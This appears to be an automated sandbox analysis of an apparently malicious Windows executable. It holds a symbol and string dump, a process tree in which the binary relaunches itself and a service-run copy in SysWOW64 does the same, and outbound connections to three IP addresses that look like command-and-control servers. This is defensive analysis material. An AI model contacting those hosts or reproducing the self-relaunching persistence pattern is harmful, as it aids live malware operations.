.text$_ZL16get_adjusted_ptrPKSt9type_infoS1_PPv
.text$_ZL28read_encoded_value_with_basehjPKhPj
.text$_ZL15get_ttype_entryP16lsda_header_infom
.text$_ZL20check_exception_specP16lsda_header_infoPKSt9type_infoPvl
.text$_ZL21base_of_encoded_valuehP15_Unwind_Context
.text$_ZL17parse_lsda_headerP15_Unwind_ContextPKhP16lsda_header_info
.text$__gxx_personality_sj0
.text$__cxa_call_unexpected
__ZNSt9exceptionD2Ev
.rdata$_ZTVSt9exception
__ZNSt9exceptionD1Ev
__ZNSt13bad_exceptionD2Ev
__ZNSt13bad_exceptionD1Ev
__ZN10__cxxabiv115__forced_unwindD2Ev
.rdata$_ZTVN10__cxxabiv115__forced_unwindE
__ZN10__cxxabiv115__forced_unwindD1Ev
__ZN10__cxxabiv119__foreign_exceptionD2Ev
.rdata$_ZTVN10__cxxabiv119__foreign_exceptionE
__ZN10__cxxabiv119__foreign_exceptionD1Ev
__ZNKSt9exception4whatEv
__ZNKSt13bad_exception4whatEv
__ZNSt9exceptionD0Ev
__ZNSt13bad_exceptionD0Ev
__ZN10__cxxabiv115__forced_unwindD0Ev
__ZN10__cxxabiv119__foreign_exceptionD0Ev
.rdata$_ZTVSt13bad_exception
.text$_ZNSt9exceptionD2Ev
.text$_ZNSt13bad_exceptionD2Ev
.text$_ZN10__cxxabiv115__forced_unwindD2Ev
.text$_ZN10__cxxabiv119__foreign_exceptionD2Ev
.text$_ZNKSt9exception4whatEv
.text$_ZNKSt13bad_exception4whatEv
.text$_ZNSt9exceptionD0Ev
.text$_ZNSt13bad_exceptionD0Ev
.text$_ZN10__cxxabiv115__forced_unwindD0Ev
.text$_ZN10__cxxabiv119__foreign_exceptionD0Ev
__ZNK10__cxxabiv117__class_type_info11__do_upcastEPKS0_PPv
__ZNK10__cxxabiv117__class_type_info20__do_find_public_srcEiPKvPKS0_S2_
__ZN10__cxxabiv117__class_type_infoD2Ev
.rdata$_ZTVN10__cxxabiv117__class_type_infoE
__ZN10__cxxabiv117__class_type_infoD1Ev
__ZN10__cxxabiv117__class_type_infoD0Ev
__ZNK10__cxxabiv117__class_type_info11__do_upcastEPKS0_PKvRNS0_15__upcast_resultE
__ZNK10__cxxabiv117__class_type_info10__do_catchEPKSt9type_infoPPvj
__ZNK10__cxxabiv117__class_type_info12__do_dyncastEiNS0_10__sub_kindEPKS0_PKvS3_S5_RNS0_16__dyncast_resultE
.rdata$_ZTISt9type_info
.rdata$_ZTSSt9type_info
.rdata$_ZTSN10__cxxabiv117__class_type_infoE
.rdata$_ZTIN10__cxxabiv117__class_type_infoE
.text$_ZNK10__cxxabiv117__class_type_info11__do_upcastEPKS0_PPv
.text$_ZNK10__cxxabiv117__class_type_info20__do_find_public_srcEiPKvPKS0_S2_
.text$_ZN10__cxxabiv117__class_type_infoD2Ev
.text$_ZN10__cxxabiv117__class_type_infoD0Ev
.text$_ZNK10__cxxabiv117__class_type_info11__do_upcastEPKS0_PKvRNS0_15__upcast_resultE
.text$_ZNK10__cxxabiv117__class_type_info10__do_catchEPKSt9type_infoPPvj
.text$_ZNK10__cxxabiv117__class_type_info12__do_dyncastEiNS0_10__sub_kindEPKS0_PKvS3_S5_RNS0_16__dyncast_resultE
__ZN10__cxxabiv120__si_class_type_infoD2Ev
.rdata$_ZTVN10__cxxabiv120__si_class_type_infoE
__ZN10__cxxabiv120__si_class_type_infoD1Ev
__ZN10__cxxabiv120__si_class_type_infoD0Ev
__ZNK10__cxxabiv120__si_class_type_info20__do_find_public_srcEiPKvPKNS_17__class_type_infoES2_
__ZNK10__cxxabiv120__si_class_type_info12__do_dyncastEiNS_17__class_type_info10__sub_kindEPKS1_PKvS4_S6_RNS1_16__dyncast_resultE
__ZNK10__cxxabiv120__si_class_type_info11__do_upcastEPKNS_17__class_type_infoEPKvRNS1_15__upcast_resultE
.rdata$_ZTSN10__cxxabiv120__si_class_type_infoE
.rdata$_ZTIN10__cxxabiv120__si_class_type_infoE
.text$_ZN10__cxxabiv120__si_class_type_infoD2Ev
.text$_ZN10__cxxabiv120__si_class_type_infoD0Ev
.text$_ZNK10__cxxabiv120__si_class_type_info20__do_find_public_srcEiPKvPKNS_17__class_type_infoES2_
.text$_ZNK10__cxxabiv120__si_class_type_info12__do_dyncastEiNS_17__class_type_info10__sub_kindEPKS1_PKvS4_S6_RNS1_16__dyncast_resultE
.text$_ZNK10__cxxabiv120__si_class_type_info11__do_upcastEPKNS_17__class_type_infoEPKvRNS1_15__upcast_resultE
si_class_type_info.cc
___cxa_call_terminate
.text$__cxa_call_terminate
__ZN10__cxxabiv111__terminateEPFvvE
__ZSt9terminatev
__ZN10__cxxabiv112__unexpectedEPFvvE
__ZSt10unexpectedv
__ZSt13set_terminatePFvvE
__ZSt14set_unexpectedPFvvE
.text$_ZN10__cxxabiv111__terminateEPFvvE
.text$_ZSt9terminatev
.text$_ZN10__cxxabiv112__unexpectedEPFvvE
.text$_ZSt10unexpectedv
.text$_ZSt13set_terminatePFvvE
.text$_ZSt14set_unexpectedPFvvE
___cxa_get_exception_ptr
___cxa_begin_catch
___cxa_end_catch
__ZSt18uncaught_exceptionv
.text$__cxa_get_exception_ptr
.text$__cxa_begin_catch
.text$__cxa_end_catch
.text$_ZSt18uncaught_exceptionv
__ZL15eh_globals_dtorPv
___shmem_init_init
__Z26__shmem_grabber_eh_globalsv
__Z20__shmem_grabber_initv
___cxa_get_globals_fast
___cxa_get_globals
.text$_ZL15eh_globals_dtorPv
.text$__shmem_init_init
.text$_Z26__shmem_grabber_eh_globalsv
.text$_Z20__shmem_grabber_initv
.text$__cxa_get_globals_fast
.text$__cxa_get_globals
.data$__shmem_ptr_init
.data$__shmem_ptr_eh_globals
__ZL23__gxx_exception_cleanup19_Unwind_Reason_CodeP17_Unwind_Exception
___cxa_throw
___cxa_rethrow
.text$_ZL23__gxx_exception_cleanup19_Unwind_Reason_CodeP17_Unwind_Exception
.text$__cxa_throw
.text$__cxa_rethrow
.text$_ZNK9__gnu_cxx24__concurrence_lock_error4whatEv
__ZNK9__gnu_cxx24__concurrence_lock_error4whatEv
.text$_ZNK9__gnu_cxx26__concurrence_unlock_error4whatEv
__ZNK9__gnu_cxx26__concurrence_unlock_error4whatEv
.text$_ZN9__gnu_cxx26__concurrence_unlock_errorD1Ev
__ZN9__gnu_cxx26__concurrence_unlock_errorD1Ev
.rdata$_ZTVN9__gnu_cxx26__concurrence_unlock_errorE
.text$_ZN9__gnu_cxx24__concurrence_lock_errorD1Ev
__ZN9__gnu_cxx24__concurrence_lock_errorD1Ev
.rdata$_ZTVN9__gnu_cxx24__concurrence_lock_errorE
.text$_ZN9__gnu_cxx26__concurrence_unlock_errorD0Ev
__ZN9__gnu_cxx26__concurrence_unlock_errorD0Ev
.text$_ZN9__gnu_cxx24__concurrence_lock_errorD0Ev
__ZN9__gnu_cxx24__concurrence_lock_errorD0Ev
.text$_ZN9__gnu_cxx30__throw_concurrence_lock_errorEv
__ZN9__gnu_cxx30__throw_concurrence_lock_errorEv
.rdata$_ZTIN9__gnu_cxx24__concurrence_lock_errorE
.text$_ZN9__gnu_cxx32__throw_concurrence_unlock_errorEv
__ZN9__gnu_cxx32__throw_concurrence_unlock_errorEv
.rdata$_ZTIN9__gnu_cxx26__concurrence_unlock_errorE
__ZN12_GLOBAL__N_115emergency_mutexE
__ZL14emergency_used
__ZL16emergency_buffer
___cxa_free_exception
___cxa_allocate_dependent_exception
__ZL15dependents_used
__ZL17dependents_buffer
___cxa_free_dependent_exception
__GLOBAL__sub_I___cxa_allocate_exception
.rdata$_ZTSN9__gnu_cxx24__concurrence_lock_errorE
.rdata$_ZTSN9__gnu_cxx26__concurrence_unlock_errorE
___cxa_allocate_exception
.text$__cxa_allocate_exception
.text$__cxa_free_exception
.text$__cxa_allocate_dependent_exception
.text$__cxa_free_dependent_exception
.text.startup._GLOBAL__sub_I___cxa_allocate_exception
.data$_ZN12_GLOBAL__N_115emergency_mutexE
.data$_ZL15dependents_used
.data$_ZL17dependents_buffer
.data$_ZL14emergency_used
.data$_ZL16emergency_buffer
.text$_ZdlPv
___cxa_pure_virtual
___cxa_deleted_virtual
.text$__cxa_pure_virtual
.text$__cxa_deleted_virtual
__ZNSt9type_infoD2Ev
.rdata$_ZTVSt9type_info
__ZNSt9type_infoD1Ev
__ZNKSt9type_info14__is_pointer_pEv
__ZNKSt9type_info15__is_function_pEv
__ZNKSt9type_info11__do_upcastEPKN10__cxxabiv117__class_type_infoEPPv
__ZNSt9type_infoD0Ev
__ZNKSt9type_infoeqERKS_
__ZNKSt9type_info10__do_catchEPKS_PPvj
.text$_ZNSt9type_infoD2Ev
.text$_ZNKSt9type_info14__is_pointer_pEv
.text$_ZNKSt9type_info15__is_function_pEv
.text$_ZNKSt9type_info11__do_upcastEPKN10__cxxabiv117__class_type_infoEPPv
.text$_ZNSt9type_infoD0Ev
.text$_ZNKSt9type_infoeqERKS_
.text$_ZNKSt9type_info10__do_catchEPKS_PPvj
___shmem_init___terminate_handler_sh
__ZN10__cxxabiv138__shmem_grabber___terminate_handler_shEv
.text$__shmem_init___terminate_handler_sh
.text$_ZN10__cxxabiv138__shmem_grabber___terminate_handler_shEv
.data$_ZN10__cxxabiv134__shmem_ptr___terminate_handler_shE
___shmem_init___unexpected_handler_sh
__ZN10__cxxabiv139__shmem_grabber___unexpected_handler_shEv
.text$__shmem_init___unexpected_handler_sh
.text$_ZN10__cxxabiv139__shmem_grabber___unexpected_handler_shEv
.data$_ZN10__cxxabiv135__shmem_ptr___unexpected_handler_shE
__ZN9__gnu_cxx27__verbose_terminate_handlerEv
__ZZN9__gnu_cxx27__verbose_terminate_handlerEvE11terminating
.text$_ZN9__gnu_cxx27__verbose_terminate_handlerEv
.data$_ZZN9__gnu_cxx27__verbose_terminate_handlerEvE11terminating
___cxa_current_exception_type
.text$__cxa_current_exception_type
_d_make_comp
_d_make_name
_d_cv_qualifiers
_d_ref_qualifier
_d_clone_suffix
_d_substitution
_standard_subs
_d_append_char
_d_number.isra.0
_d_number_component
_d_compact_number
_d_template_param
_d_discriminator
_d_source_name
_d_call_offset
_d_lookup_template_argument.isra.6
_d_find_pack
_d_growable_string_callback_adapter
_d_expr_primary
_d_template_args
_cplus_demangle_builtin_types
_d_parmlist
_d_bare_function_type
_d_encoding
_d_operator_name
_cplus_demangle_operators
_d_unqualified_name
_d_expression
_d_exprlist
_d_append_string
_d_print_comp.part.10
_d_print_comp
_d_print_mod
_d_print_mod_list
_d_print_array_type.isra.9
_d_print_function_type.isra.11
_d_print_cast.isra.12
_d_print_expr_op
_d_print_subexpr
_d_demangle_callback.constprop.16
___cxa_demangle
___gcclibcxx_demangle_callback
___dyn_tls_dtor@12
___dyn_tls_init@12
___tlregdtor
_my_lconv_init
__decode_pointer
__encode_pointer
_mingw_onexit
__gnu_exception_handler@4
__setargv
___mingw_raise_matherr
_stUserMathErr
___mingw_setusermatherr
__matherr
_CSWTCH.5
___report_error
___write_memory.part.0
_maxSections
_the_secs
__pei386_runtime_relocator
_was_init.60223
__fpreset
___do_global_dtors
___do_global_ctors
_initialized
.text.startup
___security_init_cookie
.data$__security_cookie
.data$__security_cookie_complement
___report_gsfailure
_GS_ContextRecord
_GS_ExceptionRecord
_GS_ExceptionPointers
___mingwthr_run_key_dtors.part.0
___mingwthr_cs
_key_dtor_list
____w64_mingwthr_add_key_dtor
___mingwthr_cs_init
____w64_mingwthr_remove_key_dtor
___mingw_TLScallback
pseudo-reloc-list.c
__ValidateImageBase.part.0
__ValidateImageBase
__FindPESection
__FindPESectionByName
___mingw_GetSectionForAddress
___mingw_GetSectionCount
__FindPESectionExec
__GetPEImageBase
__IsNonwritableInCurrentImage
___mingw_enum_import_library_names
___shmem_init_use_fc_key
___shmem_init_sjlj_once
_fc_key_init
__Unwind_RaiseException_Phase2
_fc_key_init_once
_uw_install_context.isra.3
__Unwind_ForcedUnwind_Phase2
___shmem_grabber_fc_static
___shmem_grabber_fc_key
___shmem_grabber_use_fc_key
___shmem_grabber_sjlj_once
__Unwind_SjLj_Register
__Unwind_SjLj_Unregister
__Unwind_GetGR
__Unwind_GetCFA
__Unwind_SetGR
__Unwind_GetIP
__Unwind_GetIPInfo
__Unwind_SetIP
__Unwind_GetLanguageSpecificData
__Unwind_GetRegionStart
__Unwind_FindEnclosingFunction
__Unwind_GetDataRelBase
__Unwind_GetTextRelBase
__Unwind_SjLj_RaiseException
__Unwind_SjLj_ForcedUnwind
__Unwind_SjLj_Resume
__Unwind_SjLj_Resume_or_Rethrow
__Unwind_DeleteException
__Unwind_Backtrace
_get_ptr_from_atom
___shmem_grab
_mingw_get_invalid_parameter_handler
_mingw_set_invalid_parameter_handler
invalid_parameter_handler.c
___shmem_winpthreads_init__pthread_tls_shmem
___shmem_winpthreads_init__pthread_key_lock_shmem
___shmem_winpthreads_init_mtx_pthr_locked_shmem
___shmem_winpthreads_init_once_global_shmem
_once_global_shmem_init
___pthread_get_pointer
_enterOnceObject
_leaveOnceObject
__pthread_once_cleanup
___pthread_register_pointer
_pop_pthread_mem
_pthread_tls_init
_push_pthread_mem.part.0
__pthread_once_raw.part.1.constprop.4
___pthread_self_lite
___shmem_winpthreads_grabber__pthread_key_dest_shmem
___shmem_winpthreads_grabber__pthread_cancelling_shmem
___shmem_winpthreads_grabber__pthread_concur_shmem
___shmem_winpthreads_grabber__pthread_tls_once_shmem
___shmem_winpthreads_grabber__pthread_tls_shmem
___shmem_winpthreads_grabber__pthread_key_lock_shmem
___shmem_winpthreads_grabber__pthread_key_max_shmem
___shmem_winpthreads_grabber__pthread_key_sch_shmem
___shmem_winpthreads_grabber_pthr_root_shmem
___shmem_winpthreads_grabber_pthr_last_shmem
___shmem_winpthreads_grabber_mtx_pthr_locked_shmem
___shmem_winpthreads_grabber_idList_shmem
___shmem_winpthreads_grabber_idListCnt_shmem
___shmem_winpthreads_grabber_idListMax_shmem
___shmem_winpthreads_grabber_idListNextId_shmem
___pth_gpointer_locked
__pthread_cleanup_dest.part.2
___dyn_tls_pthread@12
_pthread_create_wrapper
_thread_print_set
_print_state
_thread_print
___shmem_winpthreads_grabber_once_obj_shmem
___shmem_winpthreads_grabber_once_global_shmem
_pthread_timechange_handler_np
_pthread_num_processors_np
_pthread_set_num_processors_np
_pthread_once
_pthread_key_create
_pthread_key_delete
_pthread_getspecific
_pthread_setspecific
_pthread_equal
__pthread_cleanup_dest
_pthread_self
_pthread_getevent
_pthread_gethandle
_pthread_getclean
_pthread_get_concurrency
_pthread_set_concurrency
_pthread_exit
___pthread_shallcancel
__pthread_setnobreak
__pthread_invoke_cancel
_test_cancel_locked
_pthread_testcancel
_pthread_delay_np
_pthread_delay_np_ms
_pthread_cancel
_pthread_kill
__pthread_get_state
__pthread_set_state
_pthread_attr_init
_pthread_attr_destroy
_pthread_attr_setdetachstate
_pthread_attr_getdetachstate
_pthread_attr_setinheritsched
_pthread_attr_getinheritsched
_pthread_attr_setscope
_pthread_attr_getscope
_pthread_attr_getstackaddr
_pthread_attr_setstackaddr
_pthread_attr_getstacksize
_pthread_attr_setstacksize
_pthread_setcancelstate
_pthread_setcanceltype
_pthread_create
_pthread_join
__pthread_tryjoin
_pthread_detach
___shmem_winpthreads_grabber_dummy_concurrency_level_shmem
_pthread_getconcurrency
_pthread_setconcurrency
___shmem_winpthreads_init_mutex_global_shmem
_mutex_global_shmem_init
___shmem_winpthreads_init_mutex_global_static_shmem
_mutex_global_static_shmem_init
___shmem_winpthreads_init_mxattr_recursive_shmem
___shmem_winpthreads_init_mxattr_errorcheck_shmem
_mutex_ref_unlock
_mutex_ref_init
_mutex_ref_destroy
__mutex_trylock.isra.0
_mutex_unref.isra.1
___shmem_winpthreads_grabber_mutex_global_shmem
___shmem_winpthreads_grabber_mutex_global_static_shmem
_mutex_print_set
_mutex_print
___shmem_winpthreads_grabber_mxattr_recursive_shmem
___shmem_winpthreads_grabber_mxattr_errorcheck_shmem
_pthread_mutex_unlock
_pthread_mutex_init
_mutex_static_init
_mutex_ref
_pthread_mutex_lock_intern
_pthread_mutex_lock
_pthread_mutex_timedlock
_pthread_mutex_trylock
_pthread_mutex_destroy
_pthread_mutexattr_init
_pthread_mutexattr_destroy
_pthread_mutexattr_gettype
_pthread_mutexattr_settype
_pthread_mutexattr_getpshared
_pthread_mutexattr_setpshared
_pthread_mutexattr_getprotocol
_pthread_mutexattr_setprotocol
_pthread_mutexattr_getprioceiling
_pthread_mutexattr_setprioceiling
___shmem_winpthreads_grab
___shmem_winpthreads_init_spin_locked_shmem
_spin_locked_shmem_init
___shmem_winpthreads_grabber_spin_locked_shmem
_pthread_spin_init
__spin_lite_trylock
__spin_lite_unlock
__spin_lite_lock
_pthread_spin_destroy
_pthread_spin_lock
_pthread_spin_trylock
_pthread_spin_unlock
___shmem_winpthreads_init_rwl_global_shmem
_rwl_global_shmem_init
___shmem_winpthreads_init_cond_locked_shmem_rwlock
_cond_locked_shmem_init
_rwl_ref_unlock
_rwl_ref_destroy
_rwlock_gain_both_locks
_rwlock_free_both_locks
_st_cancelwrite
_rwl_unref
___shmem_winpthreads_grabber_rwl_global_shmem
_rwl_print_set
_rwl_print
___shmem_winpthreads_grabber_cond_locked_shmem_rwlock
_pthread_rwlock_init
_rwlock_static_init
_rwl_ref.isra.0
_pthread_rwlock_destroy
_pthread_rwlock_rdlock
_pthread_rwlock_timedrdlock
_pthread_rwlock_tryrdlock
_pthread_rwlock_trywrlock
_pthread_rwlock_unlock
_pthread_rwlock_wrlock
_pthread_rwlock_timedwrlock
_pthread_rwlockattr_destroy
_pthread_rwlockattr_init
_pthread_rwlockattr_getpshared
_pthread_rwlockattr_setpshared
__pthread_time_in_ms
__pthread_time_in_ms_from_timespec
__pthread_rel_time_in_ms
___shmem_winpthreads_init_cond_locked_shmem_cond
_do_sema_b_release
_cond_print_set
_cond_print
___shmem_winpthreads_grabber_cond_locked_shmem_cond
_pthread_condattr_destroy
_pthread_condattr_init
_pthread_condattr_getpshared
_pthread_condattr_getclock
_pthread_condattr_setclock
___pthread_clock_nanosleep
_pthread_condattr_setpshared
_pthread_cond_init
_cond_static_init
_do_sema_b_wait_intern
_do_sema_b_wait
_pthread_cond_destroy
_pthread_cond_signal
_pthread_cond_broadcast
_pthread_cond_wait
_cleanup_wait
_pthread_cond_timedwait
_mingw_getsp
.rdata_runtime_pseudo_reloc
_ShowWindow@8
_VirtualProtect@16
_GetThreadPriority@4
___RUNTIME_PSEUDO_RELOC_LIST__
_SetLastError@4
__imp__GetThreadContext@8
__head_lib32_libuser32_a
_SetEvent@4
__ZTIN10__cxxabiv115__forced_unwindE
_QueryPerformanceCounter@4
__imp__CloseHandle@4
__data_start__
___DTOR_LIST__
__lib32_libuser32_a_iname
___shmem_ptr_eh_globals
__imp__VirtualProtect@16
___shmem_ptr_init
__imp___acmdln
___setusermatherr
__ZTVN10__cxxabiv119__foreign_exceptionE
__ZTVSt9exception
_UnhandledExceptionFilter@4
__imp___onexit
__imp__GetLastError@0
__ZTIN10__cxxabiv119__foreign_exceptionE
_SetUnhandledExceptionFilter@4
_CreateMutexA@12
__imp__VirtualQuery@12
__imp__TlsSetValue@8
__setjmp3
__imp__CreateWindowExA@48
_GetProcessAffinityMask@12
___shmem_ptr_fc_static
__imp___ftime
___tls_start__
___native_startup_lock
__ZTVN9__gnu_cxx26__concurrence_unlock_errorE
__lib32_libadvapi32_a_iname
__imp__TlsGetValue@4
__imp__InterlockedExchange@8
___shmem_winpthreads_ptr_rwl_global_shmem
__imp__FindAtomA@4
__ZTVSt13bad_exception
_GetHandleInformation@8
__imp__InitializeCriticalSection@4
_DeleteCriticalSection@4
__rt_psrelocs_start
__imp__abort
__imp__GetDlgItem@8
__dll_characteristics__
__imp__SendDlgItemMessageA@20
__size_of_stack_commit__
__imp___fmode
___shmem_winpthreads_ptr_dummy_concurrency_level_shmem
__imp__WinExec@8
___shmem_ptr_use_fc_key
___shmem_winpthreads_ptr__pthread_tls_shmem
__size_of_stack_reserve__
__major_subsystem_version__
___crt_xl_start__
__lib32_libcomdlg32_a_iname
_AddAtomA@4
__newmode
__imp__RegisterClassA@4
___crt_xi_start__
__imp___amsg_exit
___crt_xi_end__
__imp__CreateSemaphoreA@16
_LoadCursorA@8
__ZTSSt9type_info
___shmem_winpthreads_ptr_mxattr_recursive_shmem
_GetLastError@0
__imp__QueryPerformanceCounter@4
_TranslateMessage@4
_ChooseColorA@4
_CreateSemaphoreA@16
_VirtualQuery@12
__imp__TranslateMessage@4
___shmem_ptr_fc_key
_mingw_initltsdrot_force
_DuplicateHandle@28
__imp__WaitForMultipleObjects@16
__imp___iob
__dowildcard
__imp__InterlockedDecrement@4
__imp__strncmp
___shmem_winpthreads_ptr_idListCnt_shmem
_DefWindowProcA@16
__bss_start__
___shmem_winpthreads_ptr__pthread_key_lock_shmem
__imp__fputc
___RUNTIME_PSEUDO_RELOC_LIST_END__
__imp__write
__imp__CreateEventA@16
__head_lib32_libgdi32_a
__size_of_heap_commit__
__imp__SetThreadPriority@8
_IsDlgButtonChecked@8
___onexitend
__imp__GetCurrentProcess@0
___shmem_winpthreads_ptr__pthread_key_max_shmem
__imp__DispatchMessageA@4
__ZTVSt9type_info
_mingw_pcinit
_CreateSolidBrush@4
__imp__InterlockedExchangeAdd@8
_SendDlgItemMessageA@20
___crt_xp_start__
_CreateEventA@16
_ResumeThread@4
__imp__GetDlgItemTextA@16
__ZN10__cxxabiv134__shmem_ptr___terminate_handler_shE
__MINGW_INSTALL_DEBUG_MATHERR
__imp__EnableWindow@8
__beginthreadex
___crt_xp_end__
__imp__signal
__minor_os_version__
__imp__CreateMutexA@12
_TryEnterCriticalSection@4
_LoadIconA@8
_GetTickCount@0
__image_base__
__imp__GetHandleInformation@8
__imp__exit
__section_alignment__
__imp__memmove
___shmem_winpthreads_ptr_mxattr_errorcheck_shmem
___shmem_winpthreads_ptr_mtx_pthr_locked_shmem
_SuspendThread@4
__imp___endthreadex
__imp__GetStartupInfoA@4
_WaitForMultipleObjects@16
_SetThreadContext@8
__IAT_end__
__imp____lconv_init
_GetDlgItemTextA@16
__RUNTIME_PSEUDO_RELOC_LIST__
__imp__EndDialog@8
__imp___beginthreadex
__endthreadex
__tls_start
__imp__SetProcessAffinityMask@8
___shmem_winpthreads_ptr__pthread_tls_once_shmem
___native_startup_state
__ZTVN10__cxxabiv115__forced_unwindE
_GetCurrentThread@0
___shmem_ptr_sjlj_once
__data_end__
___getmainargs
__CTOR_LIST__
___onexitbegin
__imp__ResumeThread@4
___set_app_type
_TlsAlloc@0
__imp__sprintf
__charmax
___shmem_winpthreads_ptr__pthread_key_sch_shmem
_GetMessageA@16
___mingw_winmain_lpCmdLine
__bss_end__
__imp__ReleaseSemaphore@12
_CreateWindowExA@48
__imp__RedrawWindow@16
__imp__WaitForSingleObject@8
__imp__IsDlgButtonChecked@8
___security_cookie_complement
___crt_xc_end__
_GlobalInstance
__lib32_libgdi32_a_iname
__imp___setjmp3
__tls_index
__ZTSN10__cxxabiv120__si_class_type_infoE
__imp__GetTickCount@0
__ZTIN10__cxxabiv117__class_type_infoE
__imp___set_invalid_parameter_handler
__ZTSN10__cxxabiv119__foreign_exceptionE
___crt_xc_start__
__imp__SetFileSecurityW@12
__imp__SetLastError@4
__imp__GetMessageA@16
___shmem_winpthreads_ptr__pthread_key_dest_shmem
___shmem_winpthreads_ptr_idListNextId_shmem
__imp__SuspendThread@4
__lib32_libkernel32_a_iname
___CTOR_LIST__
__imp__GetCurrentProcessId@0
__ZTSN9__gnu_cxx26__concurrence_unlock_errorE
_mingw_app_type
_PostQuitMessage@4
__imp__GetAtomNameA@12
__initterm
_DispatchMessageA@4
___shmem_winpthreads_ptr_cond_locked_shmem_rwlock
__imp__TerminateProcess@8
__rt_psrelocs_size
___shmem_winpthreads_ptr__pthread_concur_shmem
_GetStartupInfoA@4
___shmem_winpthreads_ptr_cond_locked_shmem_cond
_WaitForSingleObject@8
_GetCurrentProcessId@0
__imp____dllonexit
__imp__SendMessageA@16
__imp__memcpy
__ZTSN10__cxxabiv117__class_type_infoE
__imp__strcmp
__ZTSN10__cxxabiv115__forced_unwindE
__file_alignment__
__ZTVN9__gnu_cxx24__concurrence_lock_errorE
__imp___unlock
__head_lib32_libmsvcrt_a
__imp__SetThreadContext@8
__imp__LeaveCriticalSection@4
__imp__GetDlgItemInt@16
__imp__malloc
_SetThreadPriority@8
___shmem_winpthreads_ptr__pthread_cancelling_shmem
__imp__memcmp
___mingw_pinit
__major_os_version__
__lib32_libmsvcrt_a_iname
_ReleaseMutex@4
_CloseHandle@4
___shmem_winpthreads_ptr_spin_locked_shmem
__imp__DialogBoxParamA@20
__imp__realloc
__imp__GetThreadPriority@4
_GetDlgItem@8
__IAT_start__
___shmem_winpthreads_ptr_idListMax_shmem
__tls_end
__imp____initenv
__ZTIN9__gnu_cxx26__concurrence_unlock_errorE
__imp___get_invalid_parameter_handler
___dllonexit
__imp__InterlockedIncrement@4
__imp___lock
__DTOR_LIST__
__imp__fprintf
_TerminateProcess@8
_EnterCriticalSection@4
_ReleaseSemaphore@12
__imp__memset
__imp__fclose
__ZTSN9__gnu_cxx24__concurrence_lock_errorE
_GetThreadContext@8
___shmem_winpthreads_ptr_mutex_global_shmem
__imp___initterm
_GetCurrentThreadId@0
__size_of_heap_reserve__
___crt_xt_start__
__imp__TryEnterCriticalSection@4
__imp__SetEvent@4
___ImageBase
__subsystem__
__imp__strlen
__imp__fputs
__imp__DuplicateHandle@28
_DialogBoxParamA@20
___mingw_oldexcpt_handler
__ZTSSt13bad_exception
__imp__calloc
___native_vcclrit_reason
__imp__GetSystemTimeAsFileTime@4
_WinExec@8
___lconv_init
__amsg_exit
_SetFileSecurityW@12
__imp__PostQuitMessage@4
__imp__fopen
__imp____getmainargs
___shmem_winpthreads_ptr_mutex_global_static_shmem
___mingw_winmain_nShowCmd
___native_dllmain_reason
___tls_end__
__imp__GetProcessAffinityMask@12
__ZTISt13bad_exception
__ZTIN10__cxxabiv120__si_class_type_infoE
_GetSystemTimeAsFileTime@4
___shmem_winpthreads_ptr_pthr_last_shmem
_mingw_pcppinit
__ZTVN10__cxxabiv117__class_type_infoE
_GetCurrentProcess@0
_SendMessageA@16
_mingw_initltssuo_force
__fu0___set_invalid_parameter_handler
__ZTSSt9exception
_InitializeCriticalSection@4
__imp__free
__imp__SetUnhandledExceptionFilter@4
__major_image_version__
__imp__ResetEvent@4
__loader_flags__
__imp__UnhandledExceptionFilter@4
__imp__ShowWindow@8
_EndDialog@8
__imp__printf
__head_lib32_libkernel32_a
___chkstk_ms
_RedrawWindow@16
__imp__AddAtomA@4
__rt_psrelocs_end
__imp___cexit
__minor_subsystem_version__
__minor_image_version__
__imp__LoadIconA@8
__imp__Sleep@4
__imp__vfprintf
_TlsSetValue@8
_ResetEvent@4
__imp____set_app_type
___mingw_winmain_hInstance
__imp__InterlockedCompareExchange@12
_mingw_initltsdyn_force
___shmem_winpthreads_ptr_once_global_shmem
__imp__GetCurrentThreadId@0
_TlsGetValue@4
__imp__GetCurrentThread@0
__imp__DeleteCriticalSection@4
___security_cookie
__ZTVN10__cxxabiv120__si_class_type_infoE
_LeaveCriticalSection@4
_FindAtomA@4
___shmem_winpthreads_ptr_idList_shmem
_RegisterClassA@4
__head_lib32_libadvapi32_a
_GetDlgItemInt@16
_GetAtomNameA@12
__ZN10__cxxabiv135__shmem_ptr___unexpected_handler_shE
__imp__TlsAlloc@0
__ZTISt9type_info
_SetProcessAffinityMask@8
__RUNTIME_PSEUDO_RELOC_LIST_END__
__head_lib32_libcomdlg32_a
__imp__CreateSolidBrush@4
___dyn_tls_init_callback
__imp__ReleaseMutex@4
__imp__longjmp
__ZTIN9__gnu_cxx24__concurrence_lock_errorE
_mingw_initcharmax
__imp____setusermatherr
___shmem_winpthreads_ptr_once_obj_shmem
__tls_used
__imp__ChooseColorA@4
___crt_xt_end__
___shmem_winpthreads_ptr_pthr_root_shmem
_vfprintf
_EnableWindow@8
__imp__DefWindowProcA@16
__imp__EnterCriticalSection@4
__imp__fwrite
__imp__LoadCursorA@8
__ZTISt9exception
aseSemaphore@12
__imp__memset
__imp__fclose
Window Tester
MS Sans Serif
BUTTON
CW_USEDEFAULT
BUTTON
CW_USEDEFAULT
BUTTON
CW_USEDEFAULT
BUTTON
CW_USEDEFAULT
BUTTON
Caption:
Style(s):
Icon:
Cursor:
X Position:
Y Position:
Width:
Height:
Background Color:
Preview
This file is not on VirusTotal.

Process Tree


nonmanual.exe, PID: 1952, Parent PID: 1068
Full Path: C:\Users\user\AppData\Local\Temp\nonmanual.exe
Command Line: "C:\Users\user\AppData\Local\Temp\nonmanual.exe"
nonmanual.exe, PID: 1272, Parent PID: 1952
Full Path: C:\Users\user\AppData\Local\Temp\nonmanual.exe
Command Line: --f4134209
explorer.exe, PID: 1676, Parent PID: 1632
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE
services.exe, PID: 464, Parent PID: 376
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
compontitle.exe, PID: 112, Parent PID: 464
Full Path: C:\Windows\SysWOW64\compontitle.exe
Command Line: "C:\Windows\SysWOW64\compontitle.exe"
compontitle.exe, PID: 912, Parent PID: 112
Full Path: C:\Windows\SysWOW64\compontitle.exe
Command Line: --ce2bae20

Hosts

Direct IP Country Name
Y 78.47.106.72 [VT] Germany
Y 165.227.156.155 [VT] Germany
Y 144.76.56.36 [VT] Germany

TCP

Source Source Port Destination Destination Port
192.168.35.23 49175 144.76.56.36 8080
192.168.35.23 49177 165.227.156.155 443
192.168.35.23 49176 78.47.106.72 8080

UDP

No UDP connections recorded.

DNS

